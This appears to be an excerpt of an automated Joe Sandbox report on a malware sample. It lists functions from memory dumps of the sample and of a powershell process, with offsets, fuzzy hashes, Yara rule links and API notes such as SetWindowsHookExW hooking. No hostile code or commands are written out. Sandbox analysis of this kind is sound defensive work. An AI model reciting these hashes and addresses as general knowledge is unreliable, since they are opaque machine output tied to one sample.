                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalProcess
                                                                                          • String ID:
                                                                                          • API String ID: 2695349919-0
                                                                                          • Opcode ID: 46ae3e65ba9827cb662bb58185c781941b21bab7eac014dabb125ca227a22ae5
                                                                                          • Instruction ID: 5dea6e2660555c18f1495dd7c668ad2e70fd99981755cd2054797568eb1d1e3f
                                                                                          • Opcode Fuzzy Hash: 46ae3e65ba9827cb662bb58185c781941b21bab7eac014dabb125ca227a22ae5
                                                                                          • Instruction Fuzzy Hash: 8E215CB1901259CFDB14CF9AD480BEEFBF4AF58310F14805AE555A3240C378A944DF61
                                                                                          Function 011CFDE9 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 011CFE6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 5fe6bcb6ed0a7e60deefc487bbb80d9a4cf55c728f6a13aa42d8e4162516a2af
                                                                                          • Instruction ID: 4ee9b148c0a25da3a851a0a358195824b1d5398b1c472da5de3995d6eb9add15
                                                                                          • Opcode Fuzzy Hash: 5fe6bcb6ed0a7e60deefc487bbb80d9a4cf55c728f6a13aa42d8e4162516a2af
                                                                                          • Instruction Fuzzy Hash: 582134B1D0021A8FDB14CFAAC944BDEBBF5AB88310F14841AE419A7250C774A941CFA1
                                                                                          Function 011CFDF0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 011CFE6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4172726668.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_11c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 8483c28fef3d424c2852340709633fb4376507966d0df35085a3d6038f2c74a8
                                                                                          • Instruction ID: 576d12a76ac0d34c726ff321f187cece969248571f7c1fea8fca7c130d4b02dd
                                                                                          • Opcode Fuzzy Hash: 8483c28fef3d424c2852340709633fb4376507966d0df35085a3d6038f2c74a8
                                                                                          • Instruction Fuzzy Hash: 4F2127B1D002198FDB14DFAAC944BDEFBF5EF88720F10841AD519A7250C775A941CFA1
                                                                                          Function 0117D2B4 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac9d9167fcdcfb35262320f60a594f26f81cbea284218acbf444a520c0e2e723
                                                                                          • Instruction ID: 714ab3f0e5583fe96b9ab73785cb890ca81d4626be61d5321d8bf47bd860c0e3
                                                                                          • Opcode Fuzzy Hash: ac9d9167fcdcfb35262320f60a594f26f81cbea284218acbf444a520c0e2e723
                                                                                          • Instruction Fuzzy Hash: A521F5B5508208AFDF09DF58E5C0B26BB75FF84314F24C56DE9494B352C736D446CA62
                                                                                          Function 0117D0EC Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77a46c749672603d205242c868a5651e9a03b83210fb82c137a7277d14bbde90
                                                                                          • Instruction ID: 07442cba06c9c813a080b9eaba07059513aa29515062489377cfa84c579f6f94
                                                                                          • Opcode Fuzzy Hash: 77a46c749672603d205242c868a5651e9a03b83210fb82c137a7277d14bbde90
                                                                                          • Instruction Fuzzy Hash: 3F21D3B5604208AFDF09DF58F9C0B26BB75EF84314F24C56DD9094B356C736D446CAA2
                                                                                          Function 0117D1D4 Relevance: .1, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e8168a1207dbfb339674ce2b752bb0e59159f0d2c442253ad338c92921899836
                                                                                          • Instruction ID: e39942326b12e17c1dacd8f1547cbde35d340346831dabf58762631afe33ce26
                                                                                          • Opcode Fuzzy Hash: e8168a1207dbfb339674ce2b752bb0e59159f0d2c442253ad338c92921899836
                                                                                          • Instruction Fuzzy Hash: F921D3B15042049FDF19DF58E5C0B26BB75EF88324F20C56DE90A4B356C336D446C662
                                                                                          Function 0117D0E7 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction ID: 6611346cffe9fecde613343d94764281555dbd4eb5c53ee90840a3d2ba458832
                                                                                          • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction Fuzzy Hash: 6B11BB75504284DFDB06CF54E9C0B15BBB2FB84214F28C6AAD8094B756C33AD44ACBA2
                                                                                          Function 0117D2AF Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction ID: 379d14004daabd7e5eb8765d21f37befb59d117751127c078b06da1f2c4ffc23
                                                                                          • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                          • Instruction Fuzzy Hash: 3C11BBB5508684CFDB06CF54E5C0B15BFB2FB84318F28C6AAD8494B752C33AD44ACBA1
                                                                                          Function 0117D1CF Relevance: .1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.4171063060.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_117d000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
                                                                                          • Instruction ID: ba2b4aff31cad3f647a0cd3161142cc0e71f10265adb2476f8beb9014c6f5215
                                                                                          • Opcode Fuzzy Hash: 7c133aacda7c84256749da232d71bf144b4f4d1159547abdddc2f0c5f0aaaa43
                                                                                          • Instruction Fuzzy Hash: E211BB75504284CFDB16CF54D6C4B15BFB2FB84228F24C6A9D8094B756C33AD44ACB52

                                                                                          Executed Functions

                                                                                          Function 0485B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {Y.n^$Y.n^
                                                                                          • API String ID: 0-2803346780
                                                                                          • Opcode ID: 6db7de826d620dd4ac7a0f1092cb31c178d3adcc52d2383c360f74ddd8e43b80
                                                                                          • Instruction ID: ba53093d809c562ddef018cf1f27ad52506f8e733a08b4f63cd12c708e20ef5f
                                                                                          • Opcode Fuzzy Hash: 6db7de826d620dd4ac7a0f1092cb31c178d3adcc52d2383c360f74ddd8e43b80
                                                                                          • Instruction Fuzzy Hash: 54917270F006145BDB19EFB48A5156EB7F6EFC4700B008A1DE51AAB364DF34AE068BD5
                                                                                          Function 076C3CE8 Relevance: 5.6, Strings: 4, Instructions: 577COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-359900465
                                                                                          • Opcode ID: 5a328e04b85ecb18f6653d049234d17b5026057dbd6feb5eeb25650b2e4e1fb3
                                                                                          • Instruction ID: 5f871fb9f57bd958c8acfcdb7e5cec213ec9e8f2c4334022cab01da942472394
                                                                                          • Opcode Fuzzy Hash: 5a328e04b85ecb18f6653d049234d17b5026057dbd6feb5eeb25650b2e4e1fb3
                                                                                          • Instruction Fuzzy Hash: 151214B1B042428FCB25DB7988117BABFA2DFD5214F1480AED546CB751DF35D882CBA2
                                                                                          Function 076C24D8 Relevance: 4.2, Strings: 3, Instructions: 493COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$|,j
                                                                                          • API String ID: 0-1469847931
                                                                                          • Opcode ID: 2e9174f6ebd8552d25ccc60c70b3d2219c0816e1a77bf8c8488e005dedd2dece
                                                                                          • Instruction ID: c2ae5310671c3b712fc8bed9d11cb5a8c589aaf1d019ecf09af2b5f33fe44fda
                                                                                          • Opcode Fuzzy Hash: 2e9174f6ebd8552d25ccc60c70b3d2219c0816e1a77bf8c8488e005dedd2dece
                                                                                          • Instruction Fuzzy Hash: 5EF1F4B1B102068FCB25DBB988616BABBE5FF85210F1480AED906DB351DB35CC45CBB1
                                                                                          Function 04855AA0 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq
                                                                                          • API String ID: 0-12477121
                                                                                          • Opcode ID: ef3b85c6079f425860c360f5c0d8c5160544d91dcafac850baeb98c6abfb95d6
                                                                                          • Instruction ID: 33d2838652936e411eb23d83f792a03b6b62ee8678c281ce1463d3665215c4de
                                                                                          • Opcode Fuzzy Hash: ef3b85c6079f425860c360f5c0d8c5160544d91dcafac850baeb98c6abfb95d6
                                                                                          • Instruction Fuzzy Hash: 7151FBB0708B0DDFC368DA28C140526B7F1BB853443968E58E89BDBB19FA30FD46A751
                                                                                          Function 04856FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (jq
                                                                                          • API String ID: 0-3225323518
                                                                                          • Opcode ID: 95cc5e9f2631d9edc4b7a6c10dc8530b006bce9491e24d7fe010579336133907
                                                                                          • Instruction ID: 2b33e4bab92e078bbcdd13c1cf02bf2e41c35c9a21f89add0c9953cfe5c41095
                                                                                          • Opcode Fuzzy Hash: 95cc5e9f2631d9edc4b7a6c10dc8530b006bce9491e24d7fe010579336133907
                                                                                          • Instruction Fuzzy Hash: 47411C34B042048FDB14DFA9D458AAEBBF2EF8D311F148599D806EB3A1DB35AD01CB61
                                                                                          Function 0485AF98 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (&fq
                                                                                          • API String ID: 0-1822945044
                                                                                          • Opcode ID: 564c880c7a7c6a045e3ecabc609d4adf7e0d2481d73b8c170f4f6767342615b7
                                                                                          • Instruction ID: 0765e20a63e26583b71164cb799e2ad395f0852f63d95611b3cdcee694659983
                                                                                          • Opcode Fuzzy Hash: 564c880c7a7c6a045e3ecabc609d4adf7e0d2481d73b8c170f4f6767342615b7
                                                                                          • Instruction Fuzzy Hash: 7821DE75A042588FCB14DFAED444BAFBFF5EB88320F24856ED518E7350CA74A8058BA5
                                                                                          Function 0485DC88 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +/.n^
                                                                                          • API String ID: 0-1149576971
                                                                                          • Opcode ID: 0ac626e1085d17f058b831f068bb7968b84c9574f1154612e0a10d1e4591ca0a
                                                                                          • Instruction ID: 6256d4c88920cec8b07bcee319d43f5428cd8161aef6b82ee616d93b5d5a0f7b
                                                                                          • Opcode Fuzzy Hash: 0ac626e1085d17f058b831f068bb7968b84c9574f1154612e0a10d1e4591ca0a
                                                                                          • Instruction Fuzzy Hash: E4E068716015001BC712DA3DA80489F2FE6DFC5231310866DE489CB340DEA4C8098BE1
                                                                                          Function 0485DC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: +/.n^
                                                                                          • API String ID: 0-1149576971
                                                                                          • Opcode ID: 6f9a57dfdf6d26d2515724197f5040bcb1fb975c6983cb608da50dd2e10f0dd7
                                                                                          • Instruction ID: 7af2e1058dde0dd6951f9a667c756f659c3ee7e6ab35d18994ec34618fbc4e55
                                                                                          • Opcode Fuzzy Hash: 6f9a57dfdf6d26d2515724197f5040bcb1fb975c6983cb608da50dd2e10f0dd7
                                                                                          • Instruction Fuzzy Hash: 59E0C2317006145B8315A62EB81085F7BEBDFC4671310892EE90DC7340EF68ED464BD5
                                                                                          Function 04854638 Relevance: .3, Instructions: 273COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b128f371db9a545ae57197abd06b88d115b90df9cb6390d3620d701ed618541c
                                                                                          • Instruction ID: 407ddf1633bcf343ab44f36fc20381d4a73645f5f772f81425c822c137175d80
                                                                                          • Opcode Fuzzy Hash: b128f371db9a545ae57197abd06b88d115b90df9cb6390d3620d701ed618541c
                                                                                          • Instruction Fuzzy Hash: 9AB11A74E012089FDB15CFA8D484A9DBBF2AF88714F248559E818EB361CB70ED85CB90
                                                                                          Function 048529F0 Relevance: .2, Instructions: 222COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 65ccea44638eed5a1bc87b7c0c779961e43893a62237a950af57521f7e078e37
                                                                                          • Instruction ID: a446162c6f39089ff6ad38ee21566d0ed96718445cecc49262ef354d735bfe8a
                                                                                          • Opcode Fuzzy Hash: 65ccea44638eed5a1bc87b7c0c779961e43893a62237a950af57521f7e078e37
                                                                                          • Instruction Fuzzy Hash: 87914A74A002099FCB15CF59C4949AEBBB1FF48310B248A99D955EB3A5CB35FC92CF90
                                                                                          Function 04857740 Relevance: .2, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d14bf5c073de1c95ccd109d6e071a869f6088d4393da3b24eaf24a77dd43fa6
                                                                                          • Instruction ID: 3771abc2e15d51df00264d3de7ed62d5d35df4e3d3091da7c106d247bf27a282
                                                                                          • Opcode Fuzzy Hash: 8d14bf5c073de1c95ccd109d6e071a869f6088d4393da3b24eaf24a77dd43fa6
                                                                                          • Instruction Fuzzy Hash: 6151B2347042059FD7149B79E844A2A77E6FFC9315F148969E909DB361EB31EC01DBA0
                                                                                          Function 0485BAC0 Relevance: .2, Instructions: 155COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3ef5cf75cfcc4ef73ae7d6753f1b5726c556d33ad8304fc06ce525243d758f0
                                                                                          • Instruction ID: 525baad878b62ea426d702b714bfc8b02fa740211bf6d26e517b4c22040ac99f
                                                                                          • Opcode Fuzzy Hash: f3ef5cf75cfcc4ef73ae7d6753f1b5726c556d33ad8304fc06ce525243d758f0
                                                                                          • Instruction Fuzzy Hash: 8F611871E00248CFCB14DFA9D58469DBBF1EF98310F14862AE819AB360EB74AD45CB54
                                                                                          Function 0485BAB0 Relevance: .1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3de09bfa0aa40b34bf8fd50db070e64021399bc9886a228da29762dedd6437bb
                                                                                          • Instruction ID: aa93ced5393e0c82a8f9fa6b54a8226704e890adaae4c7b96bfa39a0f08df582
                                                                                          • Opcode Fuzzy Hash: 3de09bfa0aa40b34bf8fd50db070e64021399bc9886a228da29762dedd6437bb
                                                                                          • Instruction Fuzzy Hash: 3D513571E00248CFCB14DFA9D584A9DBBF2EF98310F14812AE819EB361EB34AD45CB55
                                                                                          Function 04856FB0 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cdb258db9eb9261ce5f7c4672a0508f8636c438226006f5a85acc11df958dae1
                                                                                          • Instruction ID: dd4e7bfc86b71f866804ae3137b21d212a662fe0981e569a27e781f7fc332636
                                                                                          • Opcode Fuzzy Hash: cdb258db9eb9261ce5f7c4672a0508f8636c438226006f5a85acc11df958dae1
                                                                                          • Instruction Fuzzy Hash: 06414F347042458FCB15DFA9D458AAEBFF1AF8A310F1885A9E845EB362DB359C01CB21
                                                                                          Function 04852B00 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab29068a1e2a841a8bd787d8f9820a91d12666a363dd7cd7d93e502f0471163f
                                                                                          • Instruction ID: 197d197f8a9246345d0dc16c0e437232f3e383158dd0229cb0a704c62e70d3ff
                                                                                          • Opcode Fuzzy Hash: ab29068a1e2a841a8bd787d8f9820a91d12666a363dd7cd7d93e502f0471163f
                                                                                          • Instruction Fuzzy Hash: AA4107B5A006099FCB05CF59C4989AEFBB1FF48310B158A99D855AB365C732FC51CFA0
                                                                                          Function 076C3CE1 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cb21e4f611b8d589830fb030a3e89191d1da0cf6bc734c9ba9e827da7b4c06ab
                                                                                          • Instruction ID: aa44f64337957e70f54034cbbff61bbd13d95607fd63aa708183149f6de55f96
                                                                                          • Opcode Fuzzy Hash: cb21e4f611b8d589830fb030a3e89191d1da0cf6bc734c9ba9e827da7b4c06ab
                                                                                          • Instruction Fuzzy Hash: 5D31B6F1A00202CBCB35CE3AC541676BBA2EF94248F18C06ED9029F359D731ED45CBA6
                                                                                          Function 0485C388 Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ecabe59f17ef44a0504b4cf59deb620150c8cfb9de17c907a1fbfbbfe2010661
                                                                                          • Instruction ID: 76618a339e48073df14e940da6239c910e7f954c1b00ca1aef742b8ac536eae3
                                                                                          • Opcode Fuzzy Hash: ecabe59f17ef44a0504b4cf59deb620150c8cfb9de17c907a1fbfbbfe2010661
                                                                                          • Instruction Fuzzy Hash: 0E3180313006019FC709EB78E894BAAB7A2EFC4315F008A3DE509CB361DF75A845CBA1
                                                                                          Function 04854843 Relevance: .1, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d76c0ecc8d8a600f3dbcae1c80565fd87a05f8980e5aeeda0083646724e48aee
                                                                                          • Instruction ID: 49152314cdde5bfbe4cf4b44991e5ea90d95dc42fe6399e04996da72f955e395
                                                                                          • Opcode Fuzzy Hash: d76c0ecc8d8a600f3dbcae1c80565fd87a05f8980e5aeeda0083646724e48aee
                                                                                          • Instruction Fuzzy Hash: 8941B674E01209AFDB05CBA8D584A9DFBF2AF49304F24C559E814AB365CB75AD82CF90
                                                                                          Function 0485AE60 Relevance: .1, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 340fb2ae58951dafcbeb78011d491bbbaa96c7cff3eb9c280a4c81abf1d3c064
                                                                                          • Instruction ID: ba176914ca8a37430454f9a55e02c3bb61fc0331e4cc403ae91842a3bdbdaac9
                                                                                          • Opcode Fuzzy Hash: 340fb2ae58951dafcbeb78011d491bbbaa96c7cff3eb9c280a4c81abf1d3c064
                                                                                          • Instruction Fuzzy Hash: 28314D70E002099FDB09DFB9D4946AE7BF6EF88314F14822DE805EB361EB749C418B55
                                                                                          Function 0485AE70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38bf65edd3777e31c4145f0335f3dd9b8a1422d2cfa2c988ebc530b45c442f52
                                                                                          • Instruction ID: f5e023bd7730f39ccb67c4b785129e69db05238bb1f7bed79006e7049ea540f0
                                                                                          • Opcode Fuzzy Hash: 38bf65edd3777e31c4145f0335f3dd9b8a1422d2cfa2c988ebc530b45c442f52
                                                                                          • Instruction Fuzzy Hash: 65313070E002099FDB09DFB9D4947AE7BF6EF89310F148629E805E7361EB74AC418B55
                                                                                          Function 0485AD28 Relevance: .1, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c38b4829905d95ce8bc87dc9727573cb6d300f042b50058eb28a9fd14c34db04
                                                                                          • Instruction ID: 6f0107b044b20bc09c581173c814194a94273d15578097b3d91e4ccd51faa943
